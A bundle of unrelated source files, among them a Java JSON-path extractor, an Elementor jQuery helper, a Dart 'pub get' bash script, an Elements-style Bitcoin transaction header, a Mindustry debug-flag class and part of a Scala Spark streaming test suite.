                            child = allChild;
                        } else {
                            String key = "" + pos;
                            if (selection.getChildren().containsKey(key)) {
                                child = selection.getChildren().get(key);
                                selectedFields.remove(key);
                            }
                        }
                        if (child == null) {
                            // this element of array is not selected, skip it
                            JsonTokenUtil.skipChildren(jts, t);
                        } else {
                            // add element position to the tail of path branch
                            path.add("" + pos);
                            // process value of this element recursively
                            extractFieldsWithOpenToken(jts, t, child, consumer, path, strictMaps,
                                    strictArrays, selection.isSkipLevel());
                            // remove field from tail of path branch
                            path.remove(path.size() - 1);
                        }
                    }
                    // let's check have we visited all selected items in this array
                    if (strictArrays && !selectedFields.isEmpty()) {
                        String notFound = selectedFields.iterator().next();
                        throw new ObjectParseException("Invalid selection: no array element exists " +
                                "at position '" + notFound + "', at: " + getPathText(path, notFound));
                    }
                }
            } else {
                if (selection.isNeedAll()) {
                    // need all elements
                    JsonTokenUtil.writeTokensFromCurrent(jts, t, consumer.getOutput());
                } else {
                    JsonTokenUtil.skipChildren(jts, t);
                }
            }
        } else { // we observe scalar value (text, integer, double, boolean, null) in real json data
            if (selection.hasChildren())
                throw new ObjectParseException("Invalid selection: the path given specifies " +
                        "fields or elements that do not exist because data at this location is " +
                        "a scalar value (i.e. string, integer, float), at: " +
                        ObjectJsonPath.getPathText(path));
            JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
        }
    }

    /**
     * Render path plus one extra trailing element as path text. The extra
     * element is appended and then removed again, so path is left unchanged.
     */
    public static String getPathText(List<String> path, String add) {
        path.add(add);
        String ret = ObjectJsonPath.getPathText(path);
        path.remove(path.size() - 1);
        return ret;
    }
}
|
<filename>src/main/java/com/github/peacetrue/beans/createmodify/CreateModify.java
package com.github.peacetrue.beans.createmodify;
import com.github.peacetrue.beans.create.Create;
import com.github.peacetrue.beans.modify.Modify;
/**
 * Aggregate audit-metadata contract: combines the {@code Create} and
 * {@code Modify} interfaces together with their Capable/Aware variants, so
 * implementors expose both creation and modification information.
 *
 * @param <T> type parameter shared with the Create/Modify contracts
 * @param <S> type parameter shared with the Create/Modify contracts
 * @author peace
 * @since 1.0
 **/
public interface CreateModify<T, S> extends
        CreateModifyCapable<T, S>, CreateModifyAware<T, S>,
        Create<T, S>, Modify<T, S> {
}
|
(function ( $ ) {
	'use strict';

	// Re-initialises qodef shortcode scripts inside the Elementor editor,
	// where widgets are re-rendered dynamically after the initial page load.
	var qodefAddonsElementor = {
		init: function () {
			if ( ! Boolean( elementorFrontend.isEditMode() ) ) {
				return;
			}
			for ( var group in qodefAddonsCore.shortcodes ) {
				for ( var name in qodefAddonsCore.shortcodes[group] ) {
					qodefAddonsElementor.reInitShortcode( group, name );
				}
			}
		},
		reInitShortcode: function ( group, name ) {
			elementorFrontend.hooks.addAction(
				'frontend/element_ready/' + group + '.default',
				function ( e ) {
					var shortcode = qodefAddonsCore.shortcodes[group][name];

					// Missing module: log the offending name instead of crashing.
					if ( typeof shortcode === 'undefined' ) {
						console.log( name );
						return;
					}

					var $sliders = e.find( '.qodef-qi-swiper-container' );
					if ( typeof shortcode.initSlider === 'function' && $sliders.length ) {
						$sliders.each(
							function () {
								shortcode.initSlider( $( this ) );
							}
						);
					} else if ( typeof shortcode.initItem === 'function' && e.find( '.qodef-shortcode' ).length ) {
						shortcode.initItem( e.find( '.qodef-shortcode' ) );
					} else {
						shortcode.init();
					}
				}
			);
		},
	};

	$( window ).on(
		'elementor/frontend/init',
		function () {
			qodefAddonsElementor.init();
		}
	);
})( jQuery );
|
#!/bin/bash
# Fetch Dart/Flutter dependencies for every package in this repository.
set -e
# Always operate from the repository root, regardless of invocation dir.
cd `dirname $0`/..

# You can pass arguments.
#
# Example:
# ./tool/pub_get.sh --offline
#
# NOTE(review): ${@:1} collapses the arguments into a single string, so
# arguments containing spaces are re-split when $ARGS is expanded below.
ARGS=${@:1}
# Run "pub get" (or "flutter pub get" when a standalone pub is unavailable)
# inside the package directory given as $1.
# $ARGS is intentionally expanded unquoted so multiple flags are passed
# through as separate words.
visit() {
  local name="$1"
  echo "-------------------------------------------------"
  echo "Getting dependencies for '$name'"
  echo "-------------------------------------------------"
  echo "Running: pub get $ARGS"
  local old_path
  old_path="$(pwd)"
  # Quote the directory: unquoted expansion breaks on paths with spaces.
  cd "$name"
  if hash pub 2>/dev/null; then
    pub get $ARGS
  else
    flutter pub get $ARGS
  fi
  cd "$old_path"
}
# Run "flutter pub get" inside the package directory given as $1.
# Silently skipped when the flutter tool is not installed.
visit_flutter() {
  if ! hash flutter 2>/dev/null; then
    return
  fi
  local name="$1"
  echo "-------------------------------------------------"
  echo "Getting dependencies for '$name'"
  echo "-------------------------------------------------"
  echo "Running: flutter pub get $ARGS"
  local old_path
  old_path="$(pwd)"
  # Quote the directory: unquoted expansion breaks on paths with spaces.
  cd "$name"
  flutter pub get $ARGS
  cd "$old_path"
}
# Package list. visit_flutter entries are skipped entirely when the flutter
# tool is not installed; visit entries fall back to "flutter pub get" only
# when a standalone pub is unavailable.
visit database
visit search
visit adapters/algolia
visit adapters/elasticsearch
visit adapters/firestore_browser
visit_flutter adapters/firestore_flutter
visit_flutter adapters/firestore_flutter/example
visit adapters/postgre
visit_flutter adapters/sqlite
visit_flutter adapters/sqlite/example
visit adapters_incubator/azure
visit adapters_incubator/grpc
visit samples/example
visit_flutter samples/example_flutter
<gh_stars>10-100
// Copyright (c) 2009-2010 <NAME>
// Copyright (c) 2009-2014 The Bitcoin developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#ifndef BITCOIN_PRIMITIVES_TRANSACTION_H
#define BITCOIN_PRIMITIVES_TRANSACTION_H
#include "amount.h"
#include "hash.h"
#include "script/script.h"
#include "serialize.h"
#include "uint256.h"
#define SERIALIZE_VERSION_MASK_NO_WITNESS 0x40000000
#define SERIALIZE_VERSION_MASK_ONLY_WITNESS 0x80000000
#define SERIALIZE_VERSION_MASK_BITCOIN_TX 0x20000000
#define SERIALIZE_VERSION_MASK_PREHASH 0x10000000
/** A transaction output value: either an explicit amount (Bitcoin-style)
 * or a 33-byte commitment with rangeproof / nonce-commitment witness data.
 * Serialization behaviour is selected by flags packed into nVersion
 * (see the SERIALIZE_VERSION_MASK_* defines above).
 */
class CTxOutValue
{
public:
    static const size_t nCommitmentSize = 33;

    // 33-byte value commitment (or explicit-amount encoding).
    std::vector<unsigned char> vchCommitment;
    // Witness data accompanying a committed value.
    std::vector<unsigned char> vchRangeproof;
    std::vector<unsigned char> vchNonceCommitment;

    CTxOutValue();
    CTxOutValue(CAmount);
    CTxOutValue(const std::vector<unsigned char>& vchValueCommitment, const std::vector<unsigned char>& vchRangeproofIn);

    ADD_SERIALIZE_METHODS;

    template<typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion)
    {
        bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
        bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
        bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
        // Bitcoin-format serialization only makes sense for explicit amounts
        // (or a null value about to be read into).
        assert(!fBitcoinTx || IsAmount() || (IsNull() && ser_action.ForRead()));
        if (fBitcoinTx) {
            // Bitcoin format: plain CAmount, no commitment/witness data.
            CAmount amount = 0;
            if (!ser_action.ForRead())
                amount = GetAmount();
            READWRITE(amount);
            if (ser_action.ForRead())
                SetToAmount(amount);
        } else {
            if (!fOnlyWitness) READWRITE(REF(CFlatData(&vchCommitment[0], &vchCommitment[nCommitmentSize])));
            if (fWitness) {
                if (nVersion & SERIALIZE_VERSION_MASK_PREHASH) {
                    // PREHASH mode: hash the witness fields instead of
                    // serializing them in full.
                    uint256 prehash = (CHashWriter(nType, nVersion) << vchRangeproof << vchNonceCommitment).GetHash();
                    READWRITE(prehash);
                } else {
                    READWRITE(vchRangeproof);
                    READWRITE(vchNonceCommitment);
                }
            }
        }
    }

    bool IsValid() const;
    bool IsNull() const;
    bool IsAmount() const;
    CAmount GetAmount() const;
    void SetToAmount(CAmount nAmount);

    friend bool operator==(const CTxOutValue& a, const CTxOutValue& b);
    friend bool operator!=(const CTxOutValue& a, const CTxOutValue& b);
};
/** An outpoint - a combination of a transaction hash and an index n into its vout */
class COutPoint
{
public:
    uint256 hash;   // id of the transaction holding the output
    uint32_t n;     // index of the output within that transaction's vout

    COutPoint() { SetNull(); }
    COutPoint(uint256 hashIn, uint32_t nIn) { hash = hashIn; n = nIn; }

    ADD_SERIALIZE_METHODS;

    template <typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
        // Flat memory dump: both members are fixed-size.
        READWRITE(FLATDATA(*this));
    }

    // Null sentinel: zero hash and index 0xffffffff.
    void SetNull() { hash = 0; n = (uint32_t) -1; }
    bool IsNull() const { return (hash == 0 && n == (uint32_t) -1); }

    // Lexicographic order by (hash, n).
    friend bool operator<(const COutPoint& a, const COutPoint& b)
    {
        return (a.hash < b.hash || (a.hash == b.hash && a.n < b.n));
    }

    friend bool operator==(const COutPoint& a, const COutPoint& b)
    {
        return (a.hash == b.hash && a.n == b.n);
    }

    friend bool operator!=(const COutPoint& a, const COutPoint& b)
    {
        return !(a == b);
    }

    std::string ToString() const;
};
/** An input of a transaction. It contains the location of the previous
 * transaction's output that it claims and a signature that matches the
 * output's public key.
 */
class CTxIn
{
public:
    COutPoint prevout;
    CScript scriptSig;
    uint32_t nSequence;

    CTxIn()
    {
        // Default to the maximal sequence number (0xffffffff).
        nSequence = ~(uint32_t)0;
    }

    explicit CTxIn(COutPoint prevoutIn, CScript scriptSigIn=CScript(), uint32_t nSequenceIn=~(uint32_t)0);
    CTxIn(uint256 hashPrevTx, uint32_t nOut, CScript scriptSigIn=CScript(), uint32_t nSequenceIn=~(uint32_t)0);

    ADD_SERIALIZE_METHODS;

    template <typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
        // scriptSig is treated as witness data; prevout and nSequence are
        // the non-witness part.
        bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
        bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
        // Partial (witness-only / witness-stripped) forms are only permitted
        // when hashing.
        assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
        if (!fOnlyWitness) READWRITE(prevout);
        if (fWitness) READWRITE(scriptSig);
        if (!fOnlyWitness) READWRITE(nSequence);
    }

    friend bool operator==(const CTxIn& a, const CTxIn& b)
    {
        return (a.prevout == b.prevout &&
                a.scriptSig == b.scriptSig &&
                a.nSequence == b.nSequence);
    }

    friend bool operator!=(const CTxIn& a, const CTxIn& b)
    {
        return !(a == b);
    }

    std::string ToString() const;
};
/** An output of a transaction. It contains the public key that the next input
 * must be able to sign with to claim it.
 */
class CTxOut
{
public:
    CTxOutValue nValue;     // explicit amount or value commitment
    CScript scriptPubKey;

    CTxOut()
    {
        SetNull();
    }

    CTxOut(const CTxOutValue& valueIn, CScript scriptPubKeyIn);

    ADD_SERIALIZE_METHODS;

    template <typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
        READWRITE(nValue);
        READWRITE(scriptPubKey);
    }

    void SetNull()
    {
        nValue = CTxOutValue();
        scriptPubKey.clear();
    }

    bool IsNull() const
    {
        return nValue.IsNull() && scriptPubKey.empty();
    }

    bool IsDust(CFeeRate minRelayTxFee) const
    {
        // Dust cannot be evaluated for non-explicit (committed) values.
        if (!nValue.IsAmount())
            return false; // FIXME
        // "Dust" is defined in terms of CTransaction::minRelayTxFee,
        // which has units satoshis-per-kilobyte.
        // If you'd pay more than 1/3 in fees
        // to spend something, then we consider it dust.
        // A typical txout is 34 bytes big, and will
        // need a CTxIn of at least 148 bytes to spend:
        // so dust is a txout less than 546 satoshis
        // with default minRelayTxFee.
        size_t nSize = GetSerializeSize(SER_DISK,0)+148u;
        return (nValue.GetAmount() < 3*minRelayTxFee.GetFee(nSize));
    }

    friend bool operator==(const CTxOut& a, const CTxOut& b)
    {
        return (a.nValue == b.nValue &&
                a.scriptPubKey == b.scriptPubKey);
    }

    friend bool operator!=(const CTxOut& a, const CTxOut& b)
    {
        return !(a == b);
    }

    std::string ToString() const;
};
struct CMutableTransaction;
/** The basic transaction that is broadcasted on the network and contained in
 * blocks. A transaction can contain multiple inputs and outputs.
 */
class CTransaction
{
private:
    /** Memory only. Cached hashes, recomputed by UpdateHash() after
     * deserialization or assignment. */
    const uint256 hash;
    const uint256 hashWitness; // Just witness
    const uint256 hashFull; // Including witness
    const uint256 hashBitcoin; // For Bitcoin Transactions

    void UpdateHash() const;

public:
    static const int32_t CURRENT_VERSION=1;

    // The local variables are made const to prevent unintended modification
    // without updating the cached hash value. However, CTransaction is not
    // actually immutable; deserialization and assignment are implemented,
    // and bypass the constness. This is safe, as they update the entire
    // structure, including the hash.
    const int32_t nVersion;
    const std::vector<CTxIn> vin;
    const CAmount nTxFee;   // explicit fee (omitted in Bitcoin-format serialization)
    const std::vector<CTxOut> vout;
    const uint32_t nLockTime;

    /** Construct a CTransaction that qualifies as IsNull() */
    CTransaction();

    /** Convert a CMutableTransaction into a CTransaction. */
    CTransaction(const CMutableTransaction &tx);

    CTransaction& operator=(const CTransaction& tx);

    ADD_SERIALIZE_METHODS;

    template <typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
        // Serialization mode flags are packed into nVersion; see the
        // SERIALIZE_VERSION_MASK_* defines.
        bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
        bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
        bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
        assert(!fBitcoinTx || (fBitcoinTx && fWitness && !fOnlyWitness));
        // Partial (witness-only / witness-stripped) forms are only permitted
        // when hashing.
        assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
        if (!fOnlyWitness) READWRITE(*const_cast<int32_t*>(&this->nVersion));
        READWRITE(*const_cast<std::vector<CTxIn>*>(&vin));
        if (!fBitcoinTx && !fOnlyWitness) READWRITE(*const_cast<CAmount*>(&nTxFee));
        if (!fOnlyWitness) READWRITE(*const_cast<std::vector<CTxOut>*>(&vout));
        if (!fOnlyWitness) READWRITE(*const_cast<uint32_t*>(&nLockTime));
        if (ser_action.ForRead())
            UpdateHash(); // refresh the cached hashes after deserialization
    }

    bool IsNull() const {
        return vin.empty() && vout.empty();
    }

    /* Transaction hash without witness information */
    const uint256& GetHash() const {
        return hash;
    }

    /* Transaction hash including witness information */
    const uint256& GetFullHash() const {
        return hashFull;
    }

    /* Hash of just witness information */
    const uint256& GetWitnessHash() const {
        return hashWitness;
    }

    /* Bitcoin-format transaction hash; asserts that it has been computed. */
    const uint256& GetBitcoinHash() const {
        assert(hashBitcoin != 0);
        return hashBitcoin;
    }

    // Compute priority, given priority of inputs and (optionally) tx size
    double ComputePriority(double dPriorityInputs, unsigned int nTxSize=0) const;

    // Compute modified tx size for priority calculation (optionally given tx size)
    unsigned int CalculateModifiedSize(unsigned int nTxSize=0) const;

    bool IsCoinBase() const
    {
        return (vin.size() == 1 && vin[0].prevout.IsNull());
    }

    // Equality compares only the cached no-witness hash.
    friend bool operator==(const CTransaction& a, const CTransaction& b)
    {
        return a.hash == b.hash;
    }

    friend bool operator!=(const CTransaction& a, const CTransaction& b)
    {
        return a.hash != b.hash;
    }

    std::string ToString() const;
};
/** A mutable version of CTransaction: same fields without the constness or
 * the cached hashes. */
struct CMutableTransaction
{
    int32_t nVersion;
    std::vector<CTxIn> vin;
    CAmount nTxFee;
    std::vector<CTxOut> vout;
    uint32_t nLockTime;

    CMutableTransaction();
    CMutableTransaction(const CTransaction& tx);

    ADD_SERIALIZE_METHODS;

    template <typename Stream, typename Operation>
    inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
        bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
        bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
        bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
        // Bitcoin-format serialization is not supported for the mutable type.
        assert(!fBitcoinTx);
        // Partial (witness-only / witness-stripped) forms are only permitted
        // when hashing.
        assert((nType != SER_GETHASH && !fOnlyWitness && fWitness) || nType == SER_GETHASH);
        if (!fOnlyWitness) READWRITE(this->nVersion);
        READWRITE(vin);
        if (!fOnlyWitness) READWRITE(nTxFee);
        if (!fOnlyWitness) READWRITE(vout);
        if (!fOnlyWitness) READWRITE(nLockTime);
    }

    bool IsCoinBase() const
    {
        return (vin.size() == 1 && vin[0].prevout.IsNull());
    }

    /** Compute the hash of this CMutableTransaction. This is computed on the
     * fly, as opposed to GetHash() in CTransaction, which uses a cached result.
     */
    uint256 GetHash() const;
};
#endif // BITCOIN_PRIMITIVES_TRANSACTION_H
|
package z.debug;
import arc.Events;
import arc.math.Mathf;
import arc.math.geom.Position;
import mindustry.Vars;
import mindustry.content.Fx;
import mindustry.entities.Effects;
import mindustry.entities.type.BaseUnit;
import mindustry.game.EventType;
import mindustry.type.UnitType;
import mindustry.world.Tile;
import z.ai.components.Squad;
import static mindustry.Vars.player;
import static mindustry.Vars.systemStrategy;
import static mindustry.Vars.tilesize;
/**
*
*/
public class ZDebug {
    public static boolean d_input = true;
    /** Disable death of surplus units at the end of a wave. */
    public static boolean disableWaveKill = true;
    public static boolean debug_blockdraw = true;
    /** Disable unit collision avoidance. */
    public static boolean disable_avoidOthers = false;
    /** Disable shadow rendering and fog-of-war rendering. */
    public static boolean disable_draw = true;
    /** Disable the map-boundary movement restriction. */
    public static boolean disable_worldBoundCheck = true;
    /** Disable vanilla floor rendering. */
    public static boolean disable_floorRender = false;
    /** Disable rendering of the map's static walls. */
    public static boolean disable_staticWallRender = false;
    /** Enable isometric (45-degree) floor development rendering. */
    public static boolean enable_floorDebug = false;
    /** Enable the "qqtx" background image rendering. */
    public static boolean enable_qqtxbackImg = false;
    /** Prevent units from dying when they leave the map's extreme bounds. */
    public static boolean disable_unitOutboundDead = true;
    /** Disable vanilla block sorting. */
    public static boolean disable_blockSort = true;
    /** Use isometric (45-degree) input event handling. */
    public static boolean enable_isoInput = true;
    /** Buildings use custom icons. */
    public static boolean enable_customIco = false;
    /** Disable the force applied at enemy spawn points. */
    public static boolean disable_spawnslimit = true;
    /** Disable vanilla build-cost/time initialization. */
    public static boolean disable_buildcost = true;
    /** Enable drawing of all entities. */
    public static boolean enable_drawAllEntity = true;
    /** Disable the spawn-point death warning. */
    public static boolean disable_spawnWarn = true;
    /** Disable ammo consumption (infinite ammo). */
    public static boolean disable_ammo = true;
    /** Disable random ore generation. */
    public static boolean disable_randomOre = true;
    /** Use custom build time/cost values. */
    public static boolean enable_customBuildCost = true;
    /** Disable item filtering. */
    public static boolean disable_itemFilter = true;
    /** Temporary code: disable cached drawing. */
    public static boolean disable_cacheDraw = false;
    /** Disable the vanilla flashing health bar. */
    public static boolean disable_lifebar = true;
    /** Force items to be added into free slots. */
    public static boolean forceAddItem = false;
    /** Disable units carrying items. */
    public static boolean disable_carryItem = true;
    /** Show custom status bars. */
    public static boolean enable_customBar = true;
    /** Instantly complete block upgrade progress. */
    public static boolean enable_accomplish = false;
    /** Use the default wave/spawn unit data. */
    public static boolean enable_defaultWave = true;
    /** Enable unit collision debug drawing. */
    public static boolean enable_drawUnitCollision = false;
    /** Enable bullet collision debug drawing. */
    public static boolean enable_drawBulletCollision = true;
    /** Enable debug drawing on the top-most layer. */
    public static boolean enable_drawDebug = true;
    /** Make all tiles passable, ignoring team and permanent static blocks. */
    public static boolean enable_allPassable = true;
    /** Load the tech tree from an XML configuration file. */
    public static boolean enable_xmlTechTree = true;
    /** Skip loading the qqtx data pack to speed up development runs. */
    public static boolean disable_packLoad = false;
    /** Enable isometric (45-degree) rendering in the editor. */
    public static boolean enable_editorIso = true;
    /** Disable Mindustry's game-over detection. */
    public static boolean disable_mindustryEndCheck = true;
    /** Hide the Mindustry player character. */
    public static boolean disable_mindustryPlayer = true;
    /** Debug-draw the player's position. */
    public static boolean debug_drawPlayer = true;
    /** Enable script file loading. */
    public static boolean enable_scriptLoader = true;
    /** Enable shadow drawing. */
    public static boolean enable_shadowDraw = true;
    /** Use sheared-texture shadows (Diablo 2 style shadow rendering). */
    public static boolean use_shadowTrans = true;
    /** Disable Mindustry's save-on-exit. */
    public static boolean disable_exitSave = true;
    /** Enable removal of all game save files. */
    public static boolean enable_removeSaves = false;
    // File-creation debug flags: begin
    /** Create the tech-tree XML file. */
    public static boolean create_TechTreeXmlFile = false;
    // File-creation debug flags: end
    // Path data: begin
    public static String techTreeFile = "F:\\Develop\\workspace\\libgdx\\zones\\Public\\DiabloTown\\SanGuoTD\\core\\assets-raw\\zonesAdd\\createFile\\techTree.xml";
    // Path data: end

    /**
     * Test helper: add a unit of the given type at the given position and
     * register it with the player's squad.
     */
    public static void addUnit(float x, float y, UnitType unitType) {
        // No spawning once the game has launched or ended.
        if (Vars.state.launched || Vars.state.gameOver) {
            return;
        }
        // Camera shake plus a smoke effect at the spawn position.
        Effects.shake(2f, 3f, new Position() {
            @Override
            public float getX() {
                return x;
            }

            @Override
            public float getY() {
                return y;
            }
        });
        Effects.effect(Fx.producesmoke, x, y);
        Tile createTile = Vars.world.ltileWorld(x, y);
        if (createTile == null) return;

        BaseUnit unit = unitType.create(Vars.player.getTeam());
        unit.setSpawner(createTile);
//        unit.setAnimationData(Core.assets.get("debug/worker/worker.paper2dsprites", AniData.class));
        // Place the unit near the tile with a small random offset.
        // NOTE(review): the branches look swapped — the isometric branch uses
        // tile.getX()/getY() while the non-iso branch uses drawxIso()/drawyIso();
        // confirm this is intentional.
        if (enable_isoInput) {
            unit.set(createTile.getX() + Mathf.range(4f / tilesize), createTile.getY() + Mathf.range(4f / tilesize));
        } else {
            unit.set(createTile.drawxIso() + Mathf.range(4), createTile.drawyIso() + Mathf.range(4));
        }
        unit.add();
//        unit.velocity().y = factory.launchVelocity;
        Events.fire(new EventType.UnitCreateEvent(unit));
        { // Squad data: register the new unit with the player's squad 0.
            Squad<BaseUnit> mySquad = systemStrategy.getSquad(player.getTeam(), 0);
//            if (mySquad == null) {
//                mySquad = new Squad<BaseUnit>();
//
//                Vec2 targetPos = mySquad.getTarget().getPosition();
//                Tile selected = world.tileWorld(targetPos.x, targetPos.y);
////                indexer.moveIndexer = selected;
//            }
            mySquad.addMember(unit);
        }
    }

    // temp test code begin
//    public static Squad<BaseUnit> mySquad;
    // temp test code end
}
|
<reponame>carpaltunnel/metalus
package com.acxiom.pipeline.streaming
import com.acxiom.pipeline._
import com.acxiom.pipeline.connectors.{DataConnectorUtilities, HDFSDataConnector}
import com.acxiom.pipeline.steps.{DataFrameReaderOptions, DataFrameWriterOptions, FlowUtilsSteps, Schema}
import org.apache.commons.io.FileUtils
import org.apache.hadoop.fs.FileSystem
import org.apache.hadoop.hdfs.{HdfsConfiguration, MiniDFSCluster}
import org.apache.log4j.{Level, Logger}
import org.apache.spark.SparkConf
import org.apache.spark.sql.functions.lit
import org.apache.spark.sql.{DataFrame, SparkSession}
import org.scalatest.{BeforeAndAfterAll, FunSpec}
import java.io.{File, OutputStreamWriter}
import java.net.{ServerSocket, Socket}
import java.nio.file.{Files, Path}
import java.util.Date
import scala.concurrent.duration.Duration
import scala.concurrent.{Await, ExecutionContext, Future}
import scala.util.Random
class StreamingTests extends FunSpec with BeforeAndAfterAll {
  implicit val executionContext: ExecutionContext = ExecutionContext.Implicits.global
  private val MASTER = "local[2]"
  private val APPNAME = "spark-streaming-steps-spark"
  private var sparkConf: SparkConf = _
  private var sparkSession: SparkSession = _
  private val sparkLocalDir: Path = Files.createTempDirectory("sparkLocal")
  private var pipelineContext: PipelineContext = _
  // Mini HDFS cluster so sinks and checkpoints run against real HDFS semantics.
  var config: HdfsConfiguration = _
  var fs: FileSystem = _
  var miniCluster: MiniDFSCluster = _
  val file = new File(sparkLocalDir.toFile.getAbsolutePath, "cluster")

  /** Start the mini HDFS cluster, a local SparkSession bound to it, and a PipelineContext. */
  override def beforeAll(): Unit = {
    Logger.getLogger("org.apache.spark").setLevel(Level.WARN)
    Logger.getLogger("org.apache.hadoop").setLevel(Level.WARN)
    Logger.getLogger("com.acxiom.pipeline").setLevel(Level.DEBUG)
    // set up mini hadoop cluster
    config = new HdfsConfiguration()
    config.set(MiniDFSCluster.HDFS_MINIDFS_BASEDIR, file.getAbsolutePath)
    miniCluster = new MiniDFSCluster.Builder(config).build()
    miniCluster.waitActive()
    // Only pull the fs object from the mini cluster
    fs = miniCluster.getFileSystem
    sparkConf = new SparkConf()
      .setMaster(MASTER)
      .setAppName(APPNAME)
      .set("spark.local.dir", sparkLocalDir.toFile.getAbsolutePath)
      // Force Spark to use the HDFS cluster
      .set("spark.hadoop.fs.defaultFS", miniCluster.getFileSystem().getUri.toString)
    sparkSession = SparkSession.builder().config(sparkConf).getOrCreate()
    pipelineContext = PipelineContext(Some(sparkConf), Some(sparkSession), Some(Map[String, Any]()),
      PipelineSecurityManager(),
      PipelineParameters(List(PipelineParameter("0", Map[String, Any]()), PipelineParameter("1", Map[String, Any]()))),
      Some(List("com.acxiom.pipeline.steps")),
      PipelineStepMapper(),
      Some(DefaultPipelineListener()),
      Some(sparkSession.sparkContext.collectionAccumulator[PipelineStepMessage]("stepMessages")))
  }

  /** Stop Spark and the mini cluster; delete the temporary directories. */
  override def afterAll(): Unit = {
    sparkSession.sparkContext.cancelAllJobs()
    sparkSession.sparkContext.stop()
    sparkSession.stop()
    miniCluster.shutdown()
    Logger.getRootLogger.setLevel(Level.INFO)
    // cleanup spark directories
    FileUtils.deleteDirectory(sparkLocalDir.toFile)
  }

  describe("Streaming Monitor") {
    it("Should run a continuous stream") {
      // Output path
      val path = miniCluster.getURI + "/metalus/data/socket_continuous.parquet"
      // 5 second query timeout (value is milliseconds)
      val ctx = pipelineContext.setGlobal("STREAMING_QUERY_TIMEOUT_MS", "5000")
      // Random port in [9000, 9100) to avoid collisions between test runs
      val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
      // Input
      val load = getReadStream(port, None)
      // Output
      val writeOptions = DataFrameWriterOptions(saveMode = "append")
      // Setup the server
      val server = new ServerSocket(port)
      // Start the query
      val query = Some(DataConnectorUtilities.buildDataStreamWriter(load, writeOptions, path).start())
      // Write Data
      val socket = sendRecords(server, Constants.FIVE * Constants.TEN)
      // Thread the step
      val future = Future {
        FlowUtilsSteps.monitorStreamingQuery(query, None, ctx)
      }
      val f = Await.ready(future, Duration.Inf)
      assert(f.isCompleted)
      socket.close()
      // Verify that anything within the path is a file unless it is the _spark_metadata directory
      fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
        assert(!status.isDirectory || status.getPath.toString == s"$path/_spark_metadata")
      })
      val hdfs = HDFSDataConnector("TestConnector", None, None)
      val df = hdfs.load(Some(path), ctx)
      // 50 == FIVE * TEN records sent above
      assert(df.count() == 50)
    }

    it("Should run a batch partitioned stream") {
      // Output path
      val path = miniCluster.getURI + "/metalus/data/socket_partitioned.parquet"
      val checkpointLocation = s"${miniCluster.getURI}/metalus/data/streaming_partitioned_checkpoint"
      // Batch monitor: stop after every 10 records; partition output by a date value.
      val ctx = pipelineContext.setGlobal("STREAMING_BATCH_MONITOR_TYPE", "count")
        .setGlobal("STREAMING_BATCH_MONITOR_COUNT", Constants.TEN)
        .setGlobal("STREAMING_BATCH_PARTITION_TEMPLATE", "date")
        .setGlobal("STREAMING_BATCH_PARTITION_GLOBAL", "PARTITION_VALUE")
        .setGlobal("PARTITION_VALUE", Constants.FILE_APPEND_DATE_FORMAT.format(new Date()))
      val port = Random.nextInt(Constants.ONE_HUNDRED) + Constants.NINE_THOUSAND
      // Output
      val writeOptions = DataFrameWriterOptions(saveMode = "append", partitionBy = Some(List("partition_column")),
        options = Some(Map("checkpointLocation" -> checkpointLocation)))
      // Setup the server
      val server = new ServerSocket(port)
      val dataFrame = getReadStream(port, Some("partition_column"), Some(Constants.FILE_APPEND_DATE_FORMAT.format(new Date())))
      // Start the query
      val query = Some(DataConnectorUtilities.buildDataStreamWriter(dataFrame, writeOptions, path).start())
      // Write Data
      val socket = sendRecords(server, Constants.TEN)
      val monitor = Some("com.acxiom.pipeline.streaming.BatchPartitionedStreamingQueryMonitor")
      // Thread the step
      val future = Future {
        val response = FlowUtilsSteps.monitorStreamingQuery(query, monitor, ctx)
        socket.close()
        assert(fs.exists(new org.apache.hadoop.fs.Path(checkpointLocation)))
        // Verify that everything within the path is a directory
        fs.listStatus(new org.apache.hadoop.fs.Path(path)).foreach(status => {
          assert(status.isDirectory)
        })
        if (response.primaryReturn.getOrElse("continue") == "continue") {
          // Delete the data because socket source doesn't have offsets
          fs.delete(new org.apache.hadoop.fs.Path(path), true)
          fs.delete(new org.apache.hadoop.fs.Path(checkpointLocation), true)
          val q1 = Some(DataConnectorUtilities.buildDataStreamWriter(
            getReadStream(port, Some("partition_column"),
              Some(Constants.FILE_APPEND_DATE_FORMAT.format(new Date()))), writeOptions, path).start())
          val s1 = sendRecords(server, Constants.TWENTY)
          val r = FlowUtilsSteps.monitorStreamingQuery(q1, monitor, ctx)
          s1.close()
          r
        } else {
          response
        }
      }
      val f = Await.ready(future, Duration.Inf)
      assert(f.isCompleted)
      server.close()
      // Verify that everything within the path is a directory
